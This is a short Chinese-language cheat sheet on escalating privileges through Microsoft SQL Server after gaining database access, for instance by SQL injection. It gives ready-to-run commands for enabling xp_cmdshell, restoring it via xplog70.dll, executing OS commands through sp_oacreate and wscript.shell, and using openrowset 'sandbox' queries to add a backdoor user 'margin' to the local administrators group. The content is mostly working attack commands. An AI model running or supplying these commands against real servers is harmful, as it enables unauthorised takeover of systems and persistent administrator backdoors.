xp_cmdshell提权

xp_cmdshell是数据库中可以执行系统命令的组件，可以通过此组件执行系统命令来提权
可以通过配置文件或者SQL注入之类的，获取到数据库权限，之后执行如下语句
EXEC sp_configure ‘show advanced options’, 1
RECONFIGURE;
EXEC sp_configure ‘xp_cmdshell’, 1;
RECONFIGURE;
即可开启xp_cmdshell

此时通过EXEC master.dbo.xp_cmdshell ‘命令’，就可以执行系统命令进行添加用户之类的提权操作

如果xp_cmdshell被删除，上传xplog70.dll可恢复
exec master.sys.sp_addextendedproc ‘xp_cmdshell’, ‘C:\Program Files\Microsoft SQL
Server\MSSQL\Binn\xplog70.dll’
最后关闭xp_cmd_shell
exec sp_configure ‘show advanced options’, 1;
reconfigure;
exec sp_configure ‘xp_cmdshell’, 0;
reconfigure;

sp_oacreate提权

sp_oacreate用来调用OLE对象，如果xp_cmdshell组件被删除也可以利用OLE对象的run方法执行系统命令
主要是用来调用 OLE 对象，利用 OLE 对象的 run 方法执行系统命令。
启用：
EXEC sp_configure ‘show advanced options’, 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure ‘Ole Automation Procedures’, 1;
RECONFIGURE WITH OVERRIDE;

关闭：
EXEC sp_configure ‘show advanced options’, 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure ‘Ole Automation Procedures’, 0;
RECONFIGURE WITH OVERRIDE;


通过如下方式执行命令
declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod
@shell,‘run’,null,‘c:\windows\system32\cmd.exe /c whoami >c:\1.txt’

SQL Server 沙盒提权

通过沙盒执行命令
开启：exec sp_configure ‘show advanced options’,1;reconfigure;
exec sp_configure ‘Ad Hoc Distributed Queries’,1;reconfigure;
关闭：exec sp_configure 'show advanced option,1;RECONFIGURE;
exec sp configure ‘Ad Hoc Distributed Queries’,0;RECONFIGURE;

执行系统命令 select * from
openrowset(‘microsoft.jet.oledb.4.0’,’;database=c:/windows/system32/ias/ias.mdb’,‘select shell(“net user
margin margin /add”)’)
select * from
openrowset(‘microsoft.jet.oledb.4.0’,’;database=c:/windows/system32/ias/ias.mdb’,‘select shell(“net
localgroup administrators margin /add”)’)